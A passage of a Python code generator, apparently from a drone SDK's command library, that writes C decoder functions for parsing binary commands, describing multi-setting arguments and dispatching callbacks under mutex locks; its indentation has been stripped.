multiset_sorted = {}
for multiset_msg in arg.argType.msgs:
multiset_cl = multiset_msg.cls if multiset_msg.cls else ArClass('defaultCls', 0, '')
if not multiset_msg.ftr in multiset_sorted:
multiset_sorted[multiset_msg.ftr] = {}
if not multiset_cl in multiset_sorted[multiset_msg.ftr]:
multiset_sorted[multiset_msg.ftr][multiset_cl] = []
multiset_sorted[multiset_msg.ftr][multiset_cl].append(multiset_msg)
get_name = lambda x: x.name
for multiset_ftr in sorted(multiset_sorted.keys(), key=get_name):
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(multiset_ftr)) + ':\n')
cfile.write (' switch (commandClass)\n')
cfile.write (' {\n')
for multiset_cl in sorted(multiset_sorted[multiset_ftr].keys(), key=get_name):
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(multiset_ftr) + '_CLASS', multiset_cl.name) + ':\n')
cfile.write (' switch (commandId)\n')
cfile.write (' {\n')
for multiset_msg in multiset_sorted[multiset_ftr][multiset_cl]:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(multiset_ftr) + '_' + multiset_cl.name + '_CMD', multiset_msg.name) + ':\n')
cfile.write (' retVal = '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(multiset_ftr)) + ARCapitalize (format_cmd_name(multiset_msg)) + 'DecodeArgs') + '(buffer, buffLen, offset')
for multiset_msg_arg in multiset_msg.args:
cfile.write (', &_' + arg.name+'->'+multiset_msg.name+'.' + multiset_msg_arg.name)
cfile.write (');\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' _' + arg.name+'->'+multiset_msg.name+'.isSet = 1;\n')
cfile.write (' }\n')
cfile.write (' break;\n')
cfile.write (' default:\n')
cfile.write (' // Command unknown\n')
cfile.write (' *offset += cmdSize;\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' break;\n')
cfile.write (' default:\n')
cfile.write (' // Command unknown\n')
cfile.write (' *offset += cmdSize;\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' break;\n')
cfile.write (' default:\n')
cfile.write (' // Command unknown\n')
cfile.write (' *offset += cmdSize;\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' if ((retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ') &&\n')
cfile.write (' (*offset < multisetEnd))\n')
cfile.write (' {\n')
cfile.write (' cmdSize = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' }\n')
cfile.write (' }\n')
else:
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' *_' + arg.name + ' = ' + xmlToReader (ftr, cmd, arg) + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('static ' +AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) +' '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DescribeArgs') + ' (uint8_t *buffer, int32_t buffLen, int32_t *offset, char *resString, int32_t strLen, int32_t *strOffset)\n')
cfile.write ('{\n')
cfile.write (' int32_t error = 0;\n')
hasMutiSet = bool([arg for arg in cmd.args if isinstance(arg.argType, ArMultiSetting)])
if hasMutiSet:
cfile.write (' eARCOMMANDS_ID_FEATURE commandFeature = -1;\n')
cfile.write (' int commandClass = -1;\n')
cfile.write (' int commandId = -1;\n')
cfile.write (' uint16_t multisetSize = 0;\n')
cfile.write (' int32_t multisetEnd = 0;\n')
cfile.write (' uint16_t cmdSize = 0;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n')
cfile.write ('\n')
cfile.write (' if ((NULL == buffer) || (NULL == resString))\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n')
cfile.write (' } // No else --> Arg check\n')
cfile.write ('\n')
for arg in cmd.args:
if isinstance(arg.argType, ArMultiSetting):
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' multisetSize = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' multisetEnd = *offset + multisetSize;\n')
cfile.write (' cmdSize = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' *strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("{", resString, strLen, *strOffset) ;\n')
cfile.write (' if (*strOffset < 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if no error occured\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' while ((retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ') &&\n')
cfile.write (' (*offset < multisetEnd))\n')
cfile.write (' {\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandFeature = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandClass = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandId = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' switch (commandFeature)\n')
cfile.write (' {\n')
#regroup multisetting msgs by feature and by class
multiset_sorted = {}
for multiset_msg in arg.argType.msgs:
multiset_cl = multiset_msg.cls if multiset_msg.cls else ArClass('defaultCls', 0, '')
if not multiset_msg.ftr in multiset_sorted:
multiset_sorted[multiset_msg.ftr] = {}
if not multiset_cl in multiset_sorted[multiset_msg.ftr]:
multiset_sorted[multiset_msg.ftr][multiset_cl] = []
multiset_sorted[multiset_msg.ftr][multiset_cl].append(multiset_msg)
get_name = lambda x: x.name
for multiset_ftr in sorted(multiset_sorted.keys(), key=get_name):
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(multiset_ftr)) + ':\n')
cfile.write (' switch (commandClass)\n')
cfile.write (' {\n')
for multiset_cl in sorted(multiset_sorted[multiset_ftr].keys(), key=get_name):
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(multiset_ftr) + '_CLASS', multiset_cl.name) + ':\n')
cfile.write (' switch (commandId)\n')
cfile.write (' {\n')
for multiset_msg in multiset_sorted[multiset_ftr][multiset_cl]:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(multiset_ftr) + '_' + multiset_cl.name + '_CMD', multiset_msg.name) + ':\n')
if multiset_msg.cls:
cfile.write (' *strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("{' + get_ftr_old_name(multiset_ftr) + '.' + multiset_cl.name +'.' + multiset_msg.name + ':", resString, strLen, *strOffset) ;\n')
else:
cfile.write (' *strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("{' + get_ftr_old_name(multiset_ftr) + '.' + multiset_msg.name + ':", resString, strLen, *strOffset) ;\n')
cfile.write (' if (*strOffset < 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if no error occured\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(multiset_ftr)) + ARCapitalize (format_cmd_name(multiset_msg)) + 'DescribeArgs') + '(buffer, buffLen, offset, resString, strLen, strOffset);\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' *strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("}", resString, strLen, *strOffset) ;\n')
cfile.write (' if (*strOffset < 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if no error occured\n')
cfile.write (' }\n')
cfile.write (' break;\n')
cfile.write (' default:\n')
cfile.write (' // Command unknown\n')
cfile.write (' *offset += cmdSize;\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' break;\n')
cfile.write (' default:\n')
cfile.write (' // Command unknown\n')
cfile.write (' *offset += cmdSize;\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' break;\n')
cfile.write (' default:\n')
cfile.write (' // Command unknown\n')
cfile.write (' *offset += cmdSize;\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' if ((retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ') &&\n')
cfile.write (' (*offset < multisetEnd))\n')
cfile.write (' {\n')
cfile.write (' cmdSize = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' /* buffer end */\n')
cfile.write (' break;\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' *strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("}", resString, strLen, *strOffset) ;\n')
cfile.write (' if (*strOffset < 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if no error occured\n')
cfile.write (' } // No else --> Processing block\n')
else:
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' ' + xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg) + ' arg = ' + xmlToReader (ftr, cmd, arg) + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 0)\n')
cfile.write (' {\n')
cfile.write (' *strOffset = ' + xmlToPrinter (ftr, cmd, arg) + ' (" | ' + arg.name + ' -> ", arg, resString, strLen, *strOffset);\n')
cfile.write (' if (*strOffset < 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if no error occured\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('// DECODER ENTRY POINT\n')
cfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n')
cfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeBuffer') + ' (const uint8_t *buffer, int32_t buffLen)\n')
cfile.write ('{\n')
cfile.write (' return ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeCommand') + ' (NULL, buffer, buffLen);\n');
cfile.write ('}\n\n')
cfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n')
cfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeCommand') + ' (ARCOMMANDS_Decoder_t *decoder, const uint8_t *buffer, int32_t buffLen)\n')
cfile.write ('{\n')
cfile.write (' ' + AREnumName (LIB_MODULE, ID_SUBMODULE, 'FEATURE') + ' commandFeature = -1;\n')
cfile.write (' int commandClass = -1;\n')
cfile.write (' int commandId = -1;\n')
cfile.write (' int32_t error = 0;\n')
cfile.write (' int32_t offset = 0;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n')
cfile.write (' if (NULL == buffer)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n')
cfile.write (' } // No else --> Arg check\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' if (' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Init') + ' () == 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n')
cfile.write (' } // No else --> keep retVal to OK if init went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandFeature = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, &offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandClass = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, &offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandId = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, &offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' switch (commandFeature)\n')
cfile.write (' {\n')
for ftr in allFeatures:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ':\n')
cfile.write (' {\n')
if ftr.classes : #project only
cfile.write (' switch (commandClass)\n')
cfile.write (' {\n')
for cl in ftr.classes:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) + ':\n')
cfile.write (' {\n')
cfile.write (' switch (commandId)\n')
cfile.write (' {\n')
for cmd in cl.cmds:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ':\n')
cfile.write (' {\n')
CBNAME = ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Cb')
CBCUSTOMNAME = ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Custom')
DECODER_CBNAME = ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Callback'
DECODER_CBCUSTOMNAME = ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Custom'
cfile.write (' if (decoder) {\n')
cfile.write (' ARSAL_Mutex_Lock (&decoder->mutex);\n')
cfile.write (' } else {\n')
cfile.write (' ARSAL_Mutex_Lock (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ');\n')
cfile.write (' }\n')
cfile.write (' if ((decoder && decoder->' + DECODER_CBNAME + ') || (!decoder && ' + CBNAME + '))\n')
cfile.write (' {\n')
for arg in cmd.args:
if ArArgType.STRING == arg.argType:
cfile.write (' ' + xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg) + ' _' + arg.name + ' = NULL;\n')
else:
cfile.write (' ' + xmlToC (LIB_MODULE, ftr, cmd, arg) + ' _' + arg.name + ';\n')
if cmd.args:
cfile.write (' retVal = '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + ARCapitalize (cmd.name) + 'DecodeArgs') + '(buffer, buffLen, &offset')
for arg in cmd.args:
cfile.write (', &_' + arg.name)
cfile.write (');\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' if (decoder && decoder->' + DECODER_CBNAME + ') {\n')
cfile.write (' decoder->' + DECODER_CBNAME + ' (')
first = True
for arg in cmd.args:
if first:
first = False
else:
cfile.write (', ')
if isinstance(arg.argType, ArMultiSetting):
cfile.write ('&_' + arg.name)
else:
cfile.write ('_' + arg.name)
if not first:
cfile.write (', ')
cfile.write ('decoder->' + DECODER_CBCUSTOMNAME + ');\n')
cfile.write (' } else {\n')
cfile.write (' ' + CBNAME + ' (')
first = True
for arg in cmd.args:
if first:
first = False
else:
cfile.write (', ')
if isinstance(arg.argType, ArMultiSetting):
cfile.write ('&_' + arg.name)
else:
cfile.write ('_' + arg.name)
if not first:
cfile.write (', ')
cfile.write (CBCUSTOMNAME + ');\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NO_CALLBACK') + ';\n')
cfile.write (' }\n')
cfile.write (' if (decoder) {\n')
cfile.write (' ARSAL_Mutex_Unlock (&decoder->mutex);\n')
cfile.write (' } else {\n')
cfile.write (' ARSAL_Mutex_Unlock (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ');\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ' */\n')
cfile.write (' default:\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) + ' */\n')
cfile.write (' default:\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' break;\n')
cfile.write (' }\n')
else:
cfile.write (' if (commandClass == ' + ARMacroName (LIB_MODULE, ID_SUBMODULE, 'FEATURE_CLASS') + ')\n')
cfile.write (' {\n')
cfile.write (' switch (commandId)\n')
cfile.write (' {\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) + ':\n')
cfile.write (' {\n')
CBNAME = ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cmd.name) + 'Cb')
CBCUSTOMNAME = ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cmd.name) + 'Custom')
DECODER_CBNAME = ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cmd.name) + 'Callback'
DECODER_CBCUSTOMNAME = ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cmd.name) + 'Custom'
cfile.write (' if (decoder) {\n')
cfile.write (' ARSAL_Mutex_Lock (&decoder->mutex);\n')
cfile.write (' } else {\n')
cfile.write (' ARSAL_Mutex_Lock (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ');\n')
cfile.write (' }\n')
cfile.write (' if ((decoder && decoder->' + DECODER_CBNAME + ') || (!decoder && ' + CBNAME + '))\n')
cfile.write (' {\n')
for arg in cmd.args:
if ArArgType.STRING == arg.argType:
cfile.write (' ' + xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg) + ' _' + arg.name + ' = NULL;\n')
else:
cfile.write (' ' + xmlToC (LIB_MODULE, ftr, cmd, arg) + ' _' + arg.name + ';\n')
if cmd.args:
cfile.write (' retVal = '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DecodeArgs') + '(buffer, buffLen, &offset')
for arg in cmd.args:
cfile.write (', &_' + arg.name)
cfile.write (');\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' if (decoder && decoder->' + DECODER_CBNAME + ') {\n')
cfile.write (' decoder->' + DECODER_CBNAME + ' (')
first = True
for arg in cmd.args:
if first:
first = False
else:
cfile.write (', ')
if isinstance(arg.argType, ArMultiSetting):
cfile.write ('&_' + arg.name)
else:
cfile.write ('_' + arg.name)
if not first:
cfile.write (', ')
cfile.write ('decoder->' + DECODER_CBCUSTOMNAME + ');\n')
cfile.write (' } else {\n')
cfile.write (' ' + CBNAME + ' (')
first = True
for arg in cmd.args:
if first:
first = False
else:
cfile.write (', ')
if isinstance(arg.argType, ArMultiSetting):
cfile.write ('&_' + arg.name)
else:
cfile.write ('_' + arg.name)
if not first:
cfile.write (', ')
cfile.write (CBCUSTOMNAME + ');\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NO_CALLBACK') + ';\n')
cfile.write (' }\n')
cfile.write (' if (decoder) {\n')
cfile.write (' ARSAL_Mutex_Unlock (&decoder->mutex);\n')
cfile.write (' } else {\n')
cfile.write (' ARSAL_Mutex_Unlock (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ');\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ' */\n')
cfile.write (' default:\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ' */\n')
cfile.write (' default:\n')
